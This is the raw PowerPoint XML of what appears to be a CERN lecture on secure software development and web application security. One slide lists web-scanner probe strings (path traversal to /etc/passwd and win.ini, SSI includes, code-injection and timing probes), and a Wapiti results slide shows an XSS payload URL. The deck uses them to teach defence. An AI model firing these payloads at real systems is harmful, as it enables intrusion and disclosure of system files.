              <a:t>../../../../../../../../../../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>/passwd%00.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>C:\boot.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>%SYSTEMROOT%\win.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>C:\boot.ini%00.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>%SYSTEMROOT%\win.ini%00.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>d'z"0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&lt;!--#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>include+file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>="/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r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>"--&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&lt;!--#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>include+file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>="C:\boot.ini"--&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>echo+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>mlYRc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>'+.+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>buwWR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>'; print+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>mlYRc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>'+++'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>buwWR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Response.Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>mlYRc+buwWR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>import+time;time.sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(4); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Thread.sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(4000);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45053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Wapiti – sample results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4710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vulnerabilityType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 name="Cross Site Scripting"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx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 &lt;vulnerabilityList&gt;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 level="1"&gt;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                  				 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http://xxx.web.cern.ch/xxx/default2.php?index=&amp;quot;&amp;gt;&amp;lt;/frame&amp;gt;&amp;lt;script&amp;gt;alert('qf3p4bpva2')&amp;lt;/script&amp;gt;&amp;amp;main=experiments/documents.php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index=&amp;quot;&amp;gt;&amp;lt;/frame&amp;gt;&amp;lt;script&amp;gt;alert('qf3p4bpva2')&amp;lt;/script&amp;gt;&amp;amp;main=experiments/documents.php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  XSS (index)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3629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Skipfish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> – sample results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987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1989" name="Picture 2" descr="E:\Local\2010.06 SWITCH\Web\movie-results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4400"/>
            <a:ext cx="7897812" cy="58578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 descr="E:\Local\2010.06 SWITCH\Web\movie-results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199" y="3140968"/>
            <a:ext cx="5889625" cy="2730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05105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needs /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Elements of common understanding of security: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confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (risk of disclosure)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integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (data altered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data worthless)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availability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (service is available as desired and designed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Also: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authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (who is the person, server, software etc.)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authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (what is that person allowed to do)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privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (controlling one’s personal information)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anonymity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (remaining unidentified to others)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non-repudiation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (user can’t deny having taken an action)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audit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (having traces of actions in separate systems/places)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3" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\Presentations\materials\epic-fail-life-preserver-f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550" y="1125538"/>
            <a:ext cx="7710488" cy="5156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457052">
            <a:off x="428625" y="4710113"/>
            <a:ext cx="3678238" cy="129381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tools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are disabled,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or impossible to use</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8090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  <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35962854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1064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3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>understand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>threats and typical attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="16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validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, validate, validate (!)</a:t>
            </a:r>
          </a:p>
          <a:p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do not trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the client</a:t>
            </a:r>
          </a:p>
          <a:p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read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and follow recommendations for your language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use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web scanning tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>harden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the Web server </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and programming platform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10788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4" descr="Picture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75" y="966788"/>
            <a:ext cx="8081963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incident in September 2008</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Multiply 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="571500"/>
            <a:ext cx="6557963" cy="6557963"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9631"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="53000"/>
            </a:srgb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77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5600" y="179388"/>
            <a:ext cx="7829550" cy="692150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" smtClean="0"/>
              <a:t>Thank you!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="C:\Temp\HEPiX\ppt - Security update\materials\in-case-of-fire-exit-building-before-tweeting-about-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5882">
            <a:off x="2771800" y="1515651"/>
            <a:ext cx="3269313" cy="413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5776" y="1469242"/>
            <a:ext cx="3960440" cy="4274071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security is difficult to achieve?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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>A system is as secure as its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>weakest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> element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like in a chain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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Defender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> needs to protect against all possible attacks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(currently known, and those yet to be discovered)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>chooses the time, place, method</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14340" name="Picture 7" descr="ch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20938"/>
            <a:ext cx="18065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security is difficult to achieve?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in computer systems – even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>harder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>great complexity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>dependency on the Operating System, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>File System, network, physical access etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Software/system security is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>difficult to measure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i="1" smtClean="0"/>
              <a:t>function a() is 30% more secure than function b() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>there are no security metrics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>How to test security?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Deadline pressure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Clients don’t demand security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>… and can’t sue a vendor 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7380288" y="4149725"/>
            <a:ext cx="1084262" cy="1638300"/>
            <a:chOff x="5239" y="1277"/>
            <a:chExt cx="984" cy="1488"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15365" name="Picture 5" descr="ladd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" y="1613"/>
              <a:ext cx="852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6" descr="clou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3" y="1277"/>
              <a:ext cx="600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38.8|21.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14179</TotalTime>
  <Words>9625</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>744</Paragraphs>
  <Slides>73</Slides>
  <Notes>73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Default Design</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Is this OK?</vt:lpstr>
      <vt:lpstr>Is this OK?</vt:lpstr>
      <vt:lpstr>… your computer might be at risk …</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>What is (computer) security?</vt:lpstr>
      <vt:lpstr>Security needs / objectives</vt:lpstr>
      <vt:lpstr>Why security is difficult to achieve?</vt:lpstr>
      <vt:lpstr>Why security is difficult to achieve?</vt:lpstr>
      <vt:lpstr>Things to avoid</vt:lpstr>
      <vt:lpstr>How much security?</vt:lpstr>
      <vt:lpstr>Threat Modeling and Risk Assessment </vt:lpstr>
      <vt:lpstr>Threat Modeling and Risk Assessment</vt:lpstr>
      <vt:lpstr>Things to avoid</vt:lpstr>
      <vt:lpstr>Protection, detection, reaction</vt:lpstr>
      <vt:lpstr>Things to avoid</vt:lpstr>
      <vt:lpstr>Security through obscurity … ?</vt:lpstr>
      <vt:lpstr>Further reading</vt:lpstr>
      <vt:lpstr>Social engineering threats</vt:lpstr>
      <vt:lpstr>Social engineering threats</vt:lpstr>
      <vt:lpstr>Social engineering – reducing risks</vt:lpstr>
      <vt:lpstr>Social engineering – reducing risks</vt:lpstr>
      <vt:lpstr>Further reading</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Software is vulnerable</vt:lpstr>
      <vt:lpstr>When to start?</vt:lpstr>
      <vt:lpstr>Software development life-cycle</vt:lpstr>
      <vt:lpstr>Requirements</vt:lpstr>
      <vt:lpstr>Architecture</vt:lpstr>
      <vt:lpstr>Things to avoid</vt:lpstr>
      <vt:lpstr>Multiple layers of defense</vt:lpstr>
      <vt:lpstr>Complexity</vt:lpstr>
      <vt:lpstr>Complexity</vt:lpstr>
      <vt:lpstr>Design – (some) golden rules</vt:lpstr>
      <vt:lpstr>Deny by default</vt:lpstr>
      <vt:lpstr>Further reading</vt:lpstr>
      <vt:lpstr>Implementation</vt:lpstr>
      <vt:lpstr>Implementation</vt:lpstr>
      <vt:lpstr>Validating an e-mail address</vt:lpstr>
      <vt:lpstr>Enemy number one: Input data</vt:lpstr>
      <vt:lpstr>Enemy #1: Input data (cont.)</vt:lpstr>
      <vt:lpstr>Enemy #1: Input data (cont.)</vt:lpstr>
      <vt:lpstr>Input validation</vt:lpstr>
      <vt:lpstr>Validation and sanitization</vt:lpstr>
      <vt:lpstr>Sanitizing output</vt:lpstr>
      <vt:lpstr>Coding – advice (cont.)</vt:lpstr>
      <vt:lpstr>Coding – advice</vt:lpstr>
      <vt:lpstr>Errors / exceptions</vt:lpstr>
      <vt:lpstr>Coding – advice (cont.)</vt:lpstr>
      <vt:lpstr>Coding – advice (cont.)</vt:lpstr>
      <vt:lpstr>Coding – advice (cont.)</vt:lpstr>
      <vt:lpstr>After implementation</vt:lpstr>
      <vt:lpstr>Source code static analysis tools</vt:lpstr>
      <vt:lpstr>Code tools: FindBugs / Java</vt:lpstr>
      <vt:lpstr>Code tools: pychecker / Python</vt:lpstr>
      <vt:lpstr>Things to avoid</vt:lpstr>
      <vt:lpstr>Further reading</vt:lpstr>
      <vt:lpstr>Message</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Focus on Web applications – why?</vt:lpstr>
      <vt:lpstr>Threats</vt:lpstr>
      <vt:lpstr>An incident in September 2008</vt:lpstr>
      <vt:lpstr>OWASP Top Ten</vt:lpstr>
      <vt:lpstr>A8: Cross-site request forgery</vt:lpstr>
      <vt:lpstr>Client-server –  no trust</vt:lpstr>
      <vt:lpstr>Web scanning tools – how they work</vt:lpstr>
      <vt:lpstr>Web scanning - HTTP requests</vt:lpstr>
      <vt:lpstr>Wapiti – sample results</vt:lpstr>
      <vt:lpstr>Skipfish – sample results</vt:lpstr>
      <vt:lpstr>Things to avoid</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>An incident in September 2008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Sebastian Lopienski</dc:creator>
  <cp:lastModifiedBy>Sebastian Lopienski</cp:lastModifiedBy>
  <cp:revision>249</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-01-24T17:08:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-08-14T13:41:11Z</dcterms:modified>
</cp:coreProperties>
</file>